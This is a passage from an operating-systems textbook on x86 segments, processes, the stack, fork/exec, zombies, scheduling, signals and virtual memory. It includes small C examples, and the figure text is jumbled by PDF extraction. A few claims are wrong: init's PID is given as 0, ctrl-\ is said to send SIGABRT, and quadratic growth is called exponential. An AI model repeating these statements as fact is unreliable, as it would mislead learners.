available to everyone are kept in the global descriptor table  or GDT for short. Each process has a number
of registers which point to entries in the GDT; these are the segments the process can access (there are
also local descriptor tables, and it all interacts with task state segments, but that's not important now). The
overall situation is illustrated in Figure 4.5, “x86 segments” .
The Operating System
73Figure 4.5. x86 segments
GateCall
DataProcess
CodeProcess
TSSProcessCODE
DATA
STACKStart : 0x1000
Size  : 0x1000
Ring  : 0
Type  : CODE
Target Segment
Target Offset
Protection
Type  : GATE
Start : 0x2000
Size  : 0x1000
Ring  : 3
Type  : CODE
Start : 0x3000
Size  : 0x1000
Ring  : 3
Type  : DATAStackProcessStart : 0x4000
Size  : 0x1000
Ring  : 3
Type  : STACK
Start : 0x5000
Size  : 0x1000
Ring  : 3
Type  : TSSCall gate invokes
code at given offset
Backing store for process
state on context switch"Far" call invokes a call gate
which redirects to another segment1
2
30"Near" call requires no
speical overheadsProtection rings ensure outer
rings can not see inner rings
Global Descriptor TableProcessRegisters, etcPROTECTED
CODEProtected
CodePROCESS
CODEFAR CALL
x86 segments in action. Notice how a "far-call" passes via a call-gate which redirects to a segment of
code running at a lower ring level. The only way to modify the code-segment selector, implicitly used
for all code addresses, is via the call mechanism. Thus the call-gate mechanism ensures that to choose a
new segment descriptor, and hence possibly change protection levels, you must transition via a known
entry point.
Since the operating system assigns the segment registers as part of the process state, the processor hardware
knows what segments of memory the currently running process can access and can enforce protection  to
ensure the process doesn't touch anything it is not supposed to. If it does go out of bounds, you receive a
segmentation fault , which most programmers are familiar with.
The picture becomes more interesting when running code needs to make calls into code that resides in
another segment. As discussed in the section called “386 protection model” , x86 does this with rings,
where ring 0 is the highest permission, ring 3 is the lowest, and inner rings can access outer rings but
not vice-versa.
As discussed in the section called “Raising Privilege” , when ring 3 code wants to jump into ring 0 code, it
is essentially modifying its code segment selector to point to a different segment. To do this, it must use a
The Operating System
74special far-call instruction which hardware ensures passes through the call gate. There is no other way for
the running process to choose a new code-segment descriptor, and hence the processor will start executing
code at the known offset within the ring 0 segment, which is responsible for maintaining integrity (e.g. not
reading arbitrary and possibly malicious code and executing it. Of course nefarious attackers will always
look for ways to make your code do what you did not intend it to!).
This allows a whole hierarchy of segments and permissions between them. You might have noticed a cross
segment call sounds exactly like a system call. If you've ever looked at Linux x86 assembly the standard
way to make a system call is int 0x80 , which raises interrupt 0x80. An interrupt stops the processor
and goes to an interrupt gate, which then works the same as a call gate -- it changes privilege level and
bounces you off to some other area of code .
The problem with this scheme is that it is slow. It takes a lot of effort to do all this checking, and many
registers need to be saved to get into the new code. And on the way back out, it all needs to be restored
again.
On a modern x86 system segmentation and the four-level ring system is not used thanks to virtual memory,
discussed fully in Chapter 6, Virtual Memory . The only thing that really happens with segmentation
switching is system calls, which essentially switch from mode 3 (userspace) to mode 0 and jump to the
system call handler code inside the kernel. Thus the processor provides extra fast system call  instructions
called sysenter  (and sysexit  to get back) which speed up the whole process over a int 0x80  call
by removing the general nature of a far-call — that is the possibility of transitioning into any segment at
any ring level — and restricting the call to only transition to ring 0 code at a specific segment and offset,
as stored in registers.
Because the general nature has been replaced with so much prior-known information, the whole process
can be speed up, and hence we have a the aforementioned fast system call . The other thing to note is that
state is not preserved when the kernel gets control. The kernel has to be careful to not to destroy state,
but it also means it is free to only save as little state as is required to do the job, so can be much more
efficient about it. This is a very RISC philosophy, and illustrates how the line blurs between RISC and
CISC processors.
For more information on how this is implemented in the Linux kernel, see the section called “Kernel
Library”.
Other ways of communicating with the kernel
ioctl
about ioctls
File Systems
about proc, sysfs, debugfs, etc
75Chapter 5. The Process
What is a process?
We are all familiar with the modern operating system running many tasks all at once or multitasking .
We can think of each process as a bundle of elements kept by the kernel to keep track of all these running
tasks.
The Process
76Elements of a processFigure 5.1. The Elements of a Process
Files
RegistersMemory
Kernel StateProcess ID
The Process
77Process ID
The process ID  (or the PID) is assigned by the operating system and is unique to each running process.
Memory
We will learn exactly how a process gets it's memory in the following weeks -- it is one of the most
fundamental parts of how the operating system works. However, for now it is sufficient to know that each
process gets it's own section of memory.
In this memory all the program code is stored, along with variables and any other allocated storage.
Parts of the memory can be shared between process (called, not surprisingly shared memory ). You will
often see this called System Five Shared Memory  (or SysV SHM) after the original implementation in an
older operating system.
Another important concept a process may utilise is that of mmaping a file on disk to memory. This means
that instead of having to open the file and use commands such as read() and write()  the file looks as
if it were any other type of RAM. mmaped areas have permissions such as read, write and execute which
need to be kept track of. As we know, it is the job of the operating system to maintain security and stability,
so it needs to check if a process tries to write to a read only area and return an error.
Code and Data
A process can be further divided into code and data sections. Program code and data should be kept
separately since they require different permissions from the operating system and separation facilitates
sharing of code (as you see later). The operating system needs to give program code permission to be
read and executed, but generally not written to. On the other hand data (variables) require read and write
permissions but should not be executable1.
The Stack
One other very important part of a process is an area of memory called the stack. This can be considered
part of the data section of a process, and is intimately involved in the execution of any program.
A stack is generic data structure that works exactly like a stack of plates; you can push an item (put a plate
on top of a stack of plates), which then becomes the top item, or you can pop an item (take a plate off,
exposing the previous plate).
Stacks are fundamental to function calls. Each time a function is called it gets a new stack frame . This
is an area of memory which usually contains, at a minimum, the address to return to when complete, the
input arguments to the function and space for local variables.
By convention, stacks usually grow down2 . This means that the stack starts at a high address in memory
and progressively gets lower.
1Not all architectures support this, however. This has lead to a wide range of security problems on many architectures.
2Some architectures, such as PA-RISC from HP, have stacks that grow upwards. On some other architectures, such as IA64, there are other storage
areas (the register backing store) that grow from the bottom toward the stack.
The Process
78Figure 5.2. The Stack
High
Address
function1(int x, int y)
{
 int z
}z =  function2(x+ y)
input (a)return addrinput (y)input (x)return addr
local (z)
{
return a +  100
}int function2(int a)Stack Frame
We can see how having a stack brings about many of the features of functions.
•Each function has its own copy of its input arguments. This is because each function is allocated a new
stack frame with its arguments in a fresh area of memory.
•This is the reason why a variable defined inside a function can not be seen by other functions. Global
variables (which can be seen by any function) are kept in a separate area of data memory.
•This facilitates recursive calls. This means a function is free to call its self again, because a new stack
frame will be created for all its local variables.
•Each frame contains the address to return to. C only allows a single value to be returned from a function,
so by convention this value is returned to the calling function in a specified register, rather than on the
stack.
•Because each frame has a reference to the one before it, a debugger can "walk" backwards, following
the pointers up the stack. From this it can produce a stack trace  which shows you all functions that were
called leading into this function. This is extremely useful for debugging.
You can see how the way functions works fits exactly into the nature of a stack. Any function can call
any other function, which then becomes the up most function (put on top of the stack). Eventually that
function will return to the function that called it (takes itself off the stack).
•Stacks do make calling functions slower, because values must be moved out of registers and into
memory. Some architectures allow arguments to be passed in registers directly; however to keep the
semantics that each function gets a unique copy of each argument the registers must rotate.
•You may have heard of the term a stack overflow . This is a common way of hacking a system by passing
bogus values. If you as a programmer accept arbitrary input into a stack variable (say, reading from the
keyboard or over the network) you need to explicitly say how big that data is going to be.
The Process
79Allowing any amount of data unchecked will simply overwrite memory. Generally this leads to a crash,
but some people realised that if they overwrote just enough memory to place a specific value in the
return address part of the stack frame, when the function completed rather than returning to the correct
place (where it was called from) they could make it return into the data they just sent. If that data contains
binary executable code that hacks the system (e.g. starts a terminal for the user with root privileges)
then your computer has been compromised.
This happens because the stack grows downwards, but data is read in "upwards" (i.e. from lower address
to higher addresses).
There are several ways around this; firstly as a programmer you must ensure that you always check the
amount of data you are receiving into a variable. The operating system can help to avoid this on behalf
of the programmer by ensuring that the stack is marked as not executable ; that is that the processor will
not run any code, even if a malicious user tries to pass some into your program. Modern architectures
and operating systems support this functionality.
•Stacks are ultimately managed by the compiler, as it is responsible for generating the program code. To
the operating system the stack just looks like any other area of memory for the process.
To keep track of the current growth of the stack, the hardware defines a register as the stack pointer . The
compiler (or the programmer, when writing in assembler) uses this register to keep track of the current
top of the stack.
Example 5.1. Stack pointer example
  1 
                  $ cat sp.c
    void function(void)
    {
  5         int i = 100;
            int j = 200;
            int k = 300;
    }
    
 10 $ gcc -fomit-frame-pointer -S sp.c
    
    $ cat sp.s
            .file   "sp.c"
            .text
 15 .globl function
            .type   function, @function
    function:
            subl    $16, %esp
            movl    $100, 4(%esp)
 20         movl    $200, 8(%esp)
            movl    $300, 12(%esp)
            addl    $16, %esp
            ret
            .size   function, .-function
 25         .ident  "GCC: (GNU) 4.0.2 20050806 (prerelease) (Debian 4.0.1-4)"
            .section        .note.GNU-stack,"",@progbits
    
                
The Process
80Above we show a simple function allocating three variables on the stack. The disassembly illustrates the
use of the stack pointer on the x86 architecture3. Firstly we allocate some space on the stack for our local
variables. Since the stack grows down, we subtract from the value held in the stack pointer. The value 16
is a value large enough to hold our local variables, but may not be exactly the size required (for example
with 3 4 byte int values we really only need 12 bytes, not 16) to keep alignment of the stack in memory
on certain boundaries as the compiler requires.
Then we move the values into the stack memory (and in a real function, use them). Finally, before returning
to our parent function we "pop" the values off the stack by moving the stack pointer back to where it was
before we started.
The Heap
The heap is an area of memory that is managed by the process for on the fly memory allocation. This is
for variables whose memory requirements are not known at compile time.
The bottom of the heap is known as the brk, so called for the system call which modifies it. By using the
brk call to grow the area downwards the process can request the kernel allocate more memory for it to use.
The heap is most commonly managed by the malloc library call. This makes managing the heap easy for
the programmer by allowing them to simply allocate and free (via the free call) heap memory. malloc
can use schemes like a buddy allocator  to manage the heap memory for the user. malloc can also be
smarter about allocation and potentially use anonymous mmaps  for extra process memory. This is where
instead of mmaping a file into the process memory it directly maps an area of system RAM. This can be
more efficient. Due to the complexity of managing memory correctly, it is very uncommon for any modern
program to have a reason to call brk directly.
3Note we used the special flag to gcc -fomit-frame-pointer  which specifies that an extra register should not be used to keep a pointer to
the start of the stack frame. Having this pointer helps debuggers to walk upwards through the stack frames, however it makes one less register
available for other applications.
The Process
81Memory LayoutFigure 5.3. Process memory layout
Kernel
Shared Libraries
mmap area
Stack
Heap
malloc()
BSS
Data
Code
Program Image
Process Memorybrk
The Process
82As we have seen a process has smaller areas of memory allocated to it, each with a specific purpose.
An example of how the process is laid out in memory by the kernel is given above. Starting from the top,
the kernel reserves its self some memory at the top of the process (we see with virtual memory how this
memory is actually shared between all processes).
Underneath that is room for mmaped files and libraries. Underneath that is the stack, and below that the
heap.
At the bottom is the program image, as loaded from the executable file on disk. We take a closer look at
the process of loading this data in later chapters.
File Descriptors
In the first week we learnt about stdin, stdout and stderr; the default files given to each process.
You will remember that these files always have the same file descriptor number (0,1,2 respectively).
Thus, file descriptors are kept by the kernel individually for each process.
File descriptors also have permissions. For example, you may be able to read from a file but not write to
it. When the file is opened, the operating system keeps a record of the processes permissions to that file
in the file descriptor and doesn't allow the process to do anything it shouldn't.
Registers
We know from the previous chapter that the processor essentially performs generally simple operations
on values in registers. These values are read (and written) to memory -- we mentioned above that each
process is allocated memory which the kernel keeps track of.
So the other side of the equation is keeping track of the registers. When it comes time for the currently
running process to give up the processor so another process can run, it needs to save it's current state.
Equally, we need to be able to restore this state when the process is given more time to run on the CPU.
To do this the operating system needs to store a copy of the CPU registers to memory. When it is time for
the process to run again, the operating system will copy the register values back from memory to the CPU
registers and the process will be right back where it left off.
Kernel State
Internally, the kernel needs to keep track of a number of elements for each process.
Process State
Another important element for the operating system to keep track of is the process state. If the process is
currently running it makes sense to have it in a running state.
However, if the process has requested to read a file from disk we know from our memory hierarchy that
this may take a significant amount of time. The process should give up it's current execution to allow
another process to run, but the kernel need not let the process run again until the data from the disk is
available in memory. Thus it can mark the process as disk wait (or similar) until the data is ready.
Priority
Some processes are more important than others, and get a higher priority. See the discussion on the
scheduler below.
The Process
83Statistics
The kernel can keep statistics on each processes behaviour which can help it make decisions about how the
process behaves; for example does it mostly read from disk or does it mostly do CPU intensive operations?
Process Hierarchy
Whilst the operating system can run many processes at the same time, in fact it only ever directly starts
one process called the init (short for initial) process. This isn't a particularly special process except that
it's PID is always 0 and it will always be running.
All other processes can be considered children of this initial process. Processes have a family tree just
like any other; each process has a parent and can have many siblings, which are processes created4 by
the same parent.
Certainly children can create more children and so on and so forth.
Example 5.2. pstree example
  1 
                  init-+-apmd
         |-atd
         |-cron
  5      ...
         |-dhclient
         |-firefox-bin-+-firefox-bin---2*[firefox-bin]
         |             |-java_vm---java_vm---13*[java_vm]
         |             `-swf_play
 10 
                
Fork and Exec
New processes are created by the two related interfaces fork and exec.
Fork
When you come to metaphorical "fork in the road" you generally have two options to take, and your
decision effects your future. Computer programs reach this fork in the road when they hit the fork()
system call.
At this point, the operating system will create a new process that is exactly the same as the parent process.
This means all the state that was talked about previously is copied, including open files, register state and
all memory allocations, which includes the program code.
The return value from the system call is the only way the process can determine if it was the existing
process or a new one. The return value to the parent process will be the Process ID (PID) of the child,
whilst the child will get a return value of 0.
At this point, we say the process has forked and we have the parent-child relationship as described above.
4The term spawn is often used when talking about parent processes creating children; as in "the process spawned a child".
The Process
84Exec
Forking provides a way for an existing process to start a new one, but what about the case where the new
process is not part of the same program as parent process? This is the case in the shell; when a user starts
a command it needs to run in a new process, but it is unrelated to the shell.
This is where the exec system call comes into play. exec will replace the contents of the currently
running process with the information from a program binary.
Thus the process the shell follows when launching a new program is to firstly fork, creating a new
process, and then exec (i.e. load into memory and execute) the program binary it is supposed to run.
How Linux actually handles fork and exec
clone
In the kernel, fork is actually implemented by a clone system call. This clone interfaces effectively
provides a level of abstraction in how the Linux kernel can create processes.
clone allows you to explicitly specify which parts of the new process are copied into the new process,
and which parts are shared between the two processes. This may seem a bit strange at first, but allows us
to easily implement threads with one very simple interface.
Threads
While fork copies all of the attributes we mentioned above, imagine if everything was copied for the new
process except for the memory. This means the parent and child share the same memory, which includes
program code and data.
The Process
85Figure 5.4. Threads
Kernel StateRegistersThread ID
Kernel StateRegistersThread IDProcess ID
Memory
Files
This hybrid child is called a thread. Threads have a number of advantages over where you might use fork
1.Separate processes can not see each others memory. They can only communicate with each other via
other system calls.
The Process
86Threads however, share the same memory. So you have the advantage of multiple processes, with the
expense of having to use system calls to communicate between them.
The problem that this raises is that threads can very easily step on each others toes. One thread might
increment a variable, and another may decrease it without informing the first thread. These type of
problems are called concurrency problems  and they are many and varied.
To help with this, there are userspace libraries that help programmers work with threads properly. The
most common one is called POSIX threads  or, as it more commonly referred to pthreads
2.Switching processes is quite expensive, and one of the major expenses is keeping track of what memory
each process is using. By sharing the memory this overhead is avoided and performance can be
significantly increased.
There are many different ways to implement threads. On the one hand, a userspace implementation could
implement threads within a process without the kernel having any idea about it. The threads all look like
they are running in a single process to the kernel.
This is suboptimal mainly because the kernel is being withheld information about what is running in the
system. It is the kernels job to make sure that the system resources are utilised in the best way possible, and
if what the kernel thinks is a single process is actually running multiple threads it may make suboptimal
decisions.
Thus the other method is that the kernel has full knowledge of the thread. Under Linux, this is established
by making all processes able to share resources via the clone system call. Each thread still has associated
kernel resources, so the kernel can take it into account when doing resource allocations.
Other operating systems have a hybrid method, where some threads can be specified to run in userspace
only ("hidden" from the kernel) and others might be a light weight process , a similar indication to the
kernel that the processes is part of a thread group.
Copy on write
As we mentioned, copying the entire memory of one process to another when fork is called is an
expensive operation.
One optimisation is called copy on write . This means that similar to threads above, the memory is actually
shared, rather than copied, between the two processes when fork is called. If the processes are only going
to be reading the memory, then actually copying the data is unnecessary.
However, when a process writes to it's memory, it needs to be a private copy that is not shared. As the
name suggests, copy on write optimises this by only doing the actual copy of the memory at the point
when it is written to.
Copy on write also has a big advantage for exec. Since exec will simply be overwriting all the memory
with the new program, actually copying the memory would waste a lot of time. Copy on write saves us
actually doing the copy.
The init process
We discussed the overall goal of the init process previously, and we are now in a position to understand
how it works.
On boot the kernel starts the init process, which then forks and execs the systems boot scripts. These fork
and exec more programs, eventually ending up forking a login process.
The Process
87The other job of the init process is "reaping". When a process calls exit with a return code, the parent
usually wants to check this code to see if the child exited correctly or not.
However, this exit code is part of the process which has just called exit. So the process is "dead" (e.g.
not running) but still needs to stay around until the return code is collected. A process in this state is called
a zombie (the traits of which you can contrast with a mystical zombie!)
A process stays as a zombie until the parent collects the return code with the wait call. However, if the
parent exits before collecting this return code, the zombie process is still around, waiting aimlessly to give
it's status to someone.
In this case, the zombie child will be reparented  to the init process which has a special handler that reaps
the return value. Thus the process is finally free and can the descriptor can be removed from the kernels
process table.
Zombie example
Example 5.3. Zombie example process
  1 
                  $ cat zombie.c
    #include <stdio.h>
    #include <stdlib.h>
  5 
    int main(void)
    {
            pid_t pid;
    
 10         printf("parent : %d\n", getpid());
    
            pid = fork();
    
            if (pid == 0) {
 15                 printf("child : %d\n", getpid());
                    sleep(2);
                    printf("child exit\n");
                    exit(1);
            }
 20 
            /* in parent */
            while (1)
            {
                    sleep(1);
 25         }
    }
    
    ianw@lime:~$ ps ax | grep [z]ombie
    16168 pts/9    S      0:00 ./zombie
 30 16169 pts/9    Z      0:00 [zombie] <defunct>
                
Above we create a zombie process. The parent process will sleep forever, whilst the child will exit after
a few seconds.
The Process
88Below the code you can see the results of running the program. The parent process (16168) is in state S
for sleep (as we expect) and the child is in state Z for zombie. The ps output also tells us that the process
is defunct  in the process description.5
Context Switching
Context switching refers to the process the kernel undertakes to switch from one process to another. XXX ?
Scheduling
A running system has many processes, maybe even into the hundreds or thousands. The part of the kernel
that keeps track of all these processes is called the scheduler  because it schedules which process should
be run next.
Scheduling algorithms are many and varied. Most users have different goals relating to what they want
their computer to do, so this affects scheduling decisions. For example, for a desktop PC you want to
make sure that your graphical applications for your desktop are given plenty of time to run, even if system
processes take a little longer. This will increase the responsiveness the user feels, as their actions will have
more immediate responses. For a server, you might want your web server application to be given priority.
People are always coming up with new algorithms, and you can probably think of your own fairly easily.
But there are a number of different components of scheduling.
Preemptive v co-operative scheduling
Scheduling strategies can broadly fall into two categories
1.Co-operative  scheduling is where the currently running process voluntarily gives up executing to allow
another process to run. The obvious disadvantage of this is that the process may decide to never give
up execution, probably because of a bug causing some form of infinite loop, and consequently nothing
else can ever run.
2.Preemptive  scheduling is where the process is interrupted to stop it an allow another process to run.
Each process gets a timeslice to run in; at the point of each context switch a timer will be reset and will
deliver and interrupt when the timeslice is over.
We know that the hardware handles the interrupt independently of the running process, and so at this
point control will return to the operating system. At this point, the scheduler can decide which process
to run next.
This is the type of scheduling used by all modern operating systems.
Realtime
Some processes need to know exactly how long their timeslice will be, and how long it will be before they
get another timeslice to run. Say you have a system running a heart-lung machine; you don't want the next
pulse to be delayed because something else decided to run in the system!
Hard realtime systems make guarantees about scheduling decisions like the maximum amount of time a
process will be interrupted before it can run again. They are often used in life critical applications like
medical, aircraft and military applications.
5The square brackets around the "z" of "zombie" are a little trick to remove the grep processes its self from the ps output. grep interprets everything
between the square brackets as a character class, but because the process name will be "grep [z]ombie" (with the brackets) this will not match!
The Process
89Soft realtime is a variation on this, where guarantees aren't as strict but general system behaviour is
predictable. Linux can be used like this, and it is often used in systems dealing with audio and video. If
you are recording an audio stream, you don't want to be interrupted for long periods of time as you will
loose audio data which can not be retrieved.
Nice value
UNIX systems assign each process a nice value. The scheduler looks at the nice value and can give priority
to those processes that have a higher "niceness".
A brief look at the Linux Scheduler
The Linux scheduler has and is constantly undergoing many changes as new developers attempt to improve
its behaviour.
The current scheduler is known as the O(1) scheduler, which refers to the property that no many how many
processes the scheduler has to choose from, it will choose the next one to run in a constant amount of time6.
Previous incarnations of the Linux scheduler used the concept of goodness to determine which process to
run next. All possible tasks are kept on a run queue , which is simply a linked list of processes which the
kernel knows are in a "runnable" state (i.e. not waiting on disk activity or otherwise asleep). The problem
arises that to calculate the next process to run, every possible runnable process must have its goodness
calculated and the one with the highest goodness ``wins''. You can see that for more tasks, it will take
longer and longer to decide which processes will run next.
Figure 5.5. The O(1) scheduler
ProcessBitmapLowest Priority Highest Priority
In contrast, the O(1) scheduler uses a run queue structure as shown above. The run queue has a number of
buckets in priority order and a bitmap that flags which buckets have processes available. Finding the next
process to run is a matter of reading the bitmap to find the first bucket with processes, then picking the
first process off that bucket's queue. The scheduler keeps two such structures, an active and expired array
for processes that are runnable and those which have utilised their entire time slice respectively. These can
be swapped by simply modifying pointers when all processes have had some CPU time.
The really interesting part, however, is how it is decided where in the run queue a process should go. Some
of the things that need to be taken into account are the nice level, processor affinity (keeping processes
tied to the processor they are running on, since moving a process to another CPU in a SMP system can
6Big-O notation is a way of describing how long an algorithm takes to run given increasing inputs. If the algorithm takes twice as long to run for
twice as much input, this is increasing linearly. If another algorithm takes four times as long to run given twice as much input, then it is increasing
exponentially. Finally if it takes the same amount of time now matter how much input, then the algorithm runs in constant time. Intuitively you can
see that the slower the algorithm grows for more input, the better it is. Computer science text books deal with algorithm analysis in more detail.
The Process
90be an expensive operation) and better support for identifying interactive programs (applications such as
a GUI which may spend much time sleeping, waiting for user input, but when the user does get around
to interacting with it wants a fast response).
The Shell
On a UNIX system, the shell is the standard interface to handling processes on your system. Once the
shell was the primary interface, however modern Linux systems have a GUI and provide a shell via a
"terminal application" or similar. The primary job of the shell is to help the user handle starting, stopping
and otherwise controlling processes running in the system.
When you type a command at the prompt of the shell, it will fork a copy of it's self and exec the
command that you have specified.
The shell then, by default, waits for that process to finish running before returning to a prompt to start
the whole process over again.
As an enhancement, the shell also allows you to background  a job, usually by placing an & after the
command name. This is simply a signal that the shell should fork and execute the command, but not wait
for the command to complete before showing you the prompt again.
The new process runs in the background, and the shell is ready waiting to start a new process should you
desire. You can usually tell the shell to foreground  a process, which means we do actually want to wait
for it to finish.
XXX : a bit of history about bourne shell
Signals
Processes running in the system require a way to be told about events that influence them. On UNIX
there is infrastructure between the kernel and processes called signals which allows a process to receive
notification about events important to it.
When a signal is sent to a process, the kernel invokes a handler which the process must register with the
kernel to deal with that signal. A handler is simply a designed function in the code that has been written to
specifically deal with interrupt. Often the signal will be sent from inside the kernel its self, however it is
also common for one process to send a signal to another process (one form of interprocess communication ).
The signal handler gets called asynchronously ; that is the currently running program is interrupted from
what it is doing to process the signal event.
For example, one type of signal is an interrupt (defined in system headers as SIGINT) is delivered to the
process when the ctrl-c combination is pressed.
As a process uses the read system call to read input from the keyboard, the kernel will be watching the
input stream looking for special characters. Should it see a ctrl-c it will jump into signal handling mode.
The kernel will look to see if the process has registered a handler for this interrupt. If it has, then execution
will be passed to that function where the function will handle it. Should the process have not registered a
handler for this particular signal, then the kernel will take some default action. With ctrl-c the default
action is to terminate the process.
A process can choose to ignore some signals, but other signals are not allowed to be ignored. For example,
SIGKILL  is the signal sent when a process should be terminated. The kernel will see that the process has
been sent this signal and terminate the process from running, no questions asked. The process can not ask
the kernel to ignore this signal, and the kernel is very careful about which process is allowed to send this
The Process
91signal to another process; you may only send it to processes owned by you unless you are the root user.
You may have seen the command kill -9 ; this comes from the implementation SIGKILL  signal. It is
commonly known that SIGKILL  is actually defined to be 0x9, and so when specified as an argument to
the kill program means that the process specified is going to be stopped immediately. Since the process
can not choose to ignore or handle this signal, it is seen as an avenue of last resort, since the program will
have no chance to clean up or exit cleanly. It is considered better to first send a SIGTERM  (for terminate)
to the process first, and if it has crashed or otherwise will not exit then resort to the SIGKILL . As a matter
of convention, most programs will install a handler for SIGHUP (hangup -- a left over from days of serial
terminals and modems) which will reload the program, perhaps to pick up changes in a configuration file
or similar.
If you have programmed on a Unix system you would be familiar with segmentation faults  when
you try to read or write to memory that has not been allocated to you. When the kernel notices that you
are touching memory outside your allocation, it will send you the segmentation fault signal. Usually the
process will not have a handler installed for this, and so the default action to terminate the program ensues
(hence your program "crashes"). In some cases a program may install a handler for segmentation faults,
although reasons for doing this are limited.
This raises the question of what happens after the signal is received. Once the signal handler has finished
running, control is returned to the process which continues on from where it left off.
Example
The following simple program introduces a lot of signals to run!
Example 5.4. Signals Example
  1 
                  $ cat signal.c
    #include <stdio.h>
    #include <unistd.h>
  5 #include <signal.h>
    
    void sigint_handler(int signum)
    {
            printf("got SIGINT\n");
 10 }
    
    int main(void)
    {
            signal(SIGINT, sigint_handler);
 15         printf("pid is %d\n", getpid());
            while (1)
                    sleep(1);
    }
    $ gcc -Wall -o signal signal.c
 20 $ ./signal
    pid is 2859
    got SIGINT # press ctrl-c 
               # press ctrl-z
    [1]+  Stopped                 ./signal
 25 
    $ kill -SIGINT 2859
    $ fg
The Process
92    ./signal
    got SIGINT
 30 Quit # press ctrl-\
    
    $
                
We have simple program that simply defines a handler for the SIGINT signal, which is sent when the
user presses ctrl-c. All the signals for the system are defined in signal.h , including the signal
function which allows us to register the handling function.
The program simply sits in a tight loop doing nothing until it quits. When we start the program, we try
pressing ctrl-c to make it quit. Rather than taking the default action, or handler is invoked and we get
the output as expected.
We then press ctrl-z which sends a SIGSTOP  which by default puts the process to sleep. This means
it is not put in the queue for the scheduler to run and is thus dormant in the system.
As an illustration, we use the kill program to send the same signal from another terminal window. This is
actually implemented with the kill system call, which takes a signal and PID to send to (this function
is a little misnamed because not all signals do actually kill the process, as we are seeing, but the signal
function was already taken to register the handler). As the process is stopped, the signal gets queued for
the process. This means the kernel takes note of the signal and will deliver it when appropriate.
At this point we wake the process up by using the command fg. This actually sends a SIGCONT  signal to
the process, which by default will wake the process back up. The kernel knows to put the process on the
run queue and give it CPU time again. We see at this point the queued signal is delivered.
In desperation to get rid of the program, we finally try ctrl-\ which sends a SIGABRT  (abort) to the
process. But if the process has aborted, where did the Quit output come from?
You guessed it, more signals! When a parent child has a process that dies, it gets a SIGCHLD  signal back.
In this case the shell was the parent process and so it got the signal. Remember how we have the zombie
process that needs to be reaped with the wait call to get the return code from the child process? Well
another thing it also gives the parent is the signal number that the child may have died from. Thus the
shell knows that child process died from a SIGABRT  and as an informational service prints as much for
the user (the same process happens to print out "Segmentation Fault" when the child process dies from
a SIGSEGV ).
You can see how in even a simple program, around 5 different signals were used to communicate between
processes and the kernel and keep things running. There are many other signals, but these are certainly
amongst the most common. Most have system functions defined by the kernel, but there are a few signals
reserved for users to use for their own purposes within their programs ( SIGUSR).
93Chapter 6. Virtual Memory
What Virtual Memory isn't
Virtual memory is often naively discussed as a way to extended your RAM by using the hard drive as
extra, slower, system memory. That is, once your system runs out of memory, it flows over onto the hard
drive which is used as "virtual" memory.
In modern operating systems, this is commonly referred to as swap space , because unused parts of memory
as swapped out to disk to free up main memory (remember, programs can only execute from main
memory).
Indeed, the ability to swap out memory to disk is an important capability, but as you will see it is not the
purpose of virtual memory, but rather a very useful side effect!
What virtual memory is
Virtual memory is all about making use of address space .
The address space of a processor refers the range of possible addresses that it can use when loading and
storing to memory. The address space is limited by the width of the registers, since as we know to load an
address we need to issue a load instruction with the address to load from stored in a register. For example,
registers that are 32 bits wide can hold addresses in a register range from 0x00000000  to 0xFFFFFFF .
2^32 is equal to 4GB, so a 32 bit processor can load or store to up to 4GB of memory.
64 bit computing
New processors are generally all 64-bit processors, which as the name suggests has registers 64 bits wide.
As an exercise, you should work out the address space available to these processors (hint: it's big!).
64-bit computing does have some trade-offs against using smaller bit-width processors. Every program
compiled in 64-bit mode requires 8-byte pointers, which can increase code and data size, and hence impact
both instruction and data cache performance. However, 64-bit processers tend to have more registers,
which means less need to save temporary variables to memory when the compiler is under register pressure.
Canonical Addresses
While 64-bit processors have 64-bit wide registers, systems generally do not implement all 64-bits for
addressing — it is not actually possible to do load or store to all 16 exabytes of theoretical physical
memory!
Thus most architectures define an unimplemented  region of the address space which the processor will
consider invalid for use. x86-64 and Itanium both define the most-significant valid bit of an address, which
must then be sign-extended (see the section called “Sign-extension” ) to create a valid address. The result
of this is that the total address space is effectively divided into two parts, an upper and a lower portion, with
the addresses in-between considered invalid. This is illustrated in Figure 6.1, “Illustration of canonical
addresses” . Valid addresses are termed canonical addresses  (invalid addresses being non-canonical).
Virtual Memory
94Figure 6.1. Illustration of canonical addresses
Implementations define the most significant
implemented bit, which must be
sign-extended to create a full address
This has the effect of partitioning
the total address space into an
upper and lower portion, with 
addresses inbetween considered
invalid
0000000...1111111... 1
0
All higher bits must be the same as this bitLOWERUPPERUnimplemented bits Most significant implemented bitFull addressTotal address space
The exact most-significant bit value for the processor can usually be found by querying the processor itself
using its informational instructions. Although the exact value is implementation dependent, a typical value
would be 48; providing 248 = 256 TiB of usable address-space.
Reducing the possible address-space like this means that significant savings can be made with all parts
of the addressing logic in the processor and related components, as they know they will not need to deal
with full 64-bit addresses. Since the implementation defines the upper-bits as being signed-extended, this
prevents portable operating systems using these bits to store or flag additional information and ensuring
compatibility if the implementation wishes to implement more address-space in the future.
Using the address space
As with most components of the operating system, virtual memory acts as an abstraction between the
address space and the physical memory available in the system. This means that when a program uses an
address that address does not refer to the bits in an actual physical location in memory.
So to this end, we say that all addresses a program uses are virtual. The operating system keeps track of
virtual addresses and how they are allocated to physical addresses. When a program does a load or store
from an address, the processor and operating system work together to convert this virtual address to the
actual address in the system memory chips.
Pages
The total address-space is divided into individual pages. Pages can be many different sizes; generally they
are around 4 KiB, but this is not a hard and fast rule and they can be much larger but generally not any
smaller. The page is the smallest unit of memory that the operating system and hardware can deal with.
Additionally, each page has a number of attributes set by the operating system. Generally, these include
read, write and execute permissions for the current page. For example, the operating system can generally
mark the code pages of a process with an executable flag and the processor can choose to not execute any
code from pages without this bit set.
Virtual Memory
95Figure 6.2. Virtual memory pages
PagePagePagePage
Virtual Address Space
Programmers may at this point be thinking that they can easily allocate small amounts of memory, much
smaller than 4 KiB, using malloc or similar calls. This heap memory is actually backed by page-size
allocations, which the malloc implementation divides up and manages for you in an efficient manner.
Physical Memory
Just as the operating system divides the possible address space up into pages, it divides the available
physical memory up into frames. A frame is just the conventional name for a hunk of physical memory
the same size as the system page size.
The operating system keeps a frame-table  which is a list of all possible pages of physical memory and if
they are free (available for allocation) or not. When memory is allocated to a process, it is marked as used
in the frame-table. In this way, the operating-system keeps track of all memory allocations.
How does the operating system know what memory is available? This information about where memory
is located, how much, attributes and so forth is passed to the operating system by the BIOS during
initialisation.
Pages + Frames = Page Tables
It is the job of the operating system is to keep track of which of virtual-page points to which physical
frame. This information is kept in a page-table  which, in its simplest form, could simply be a table where
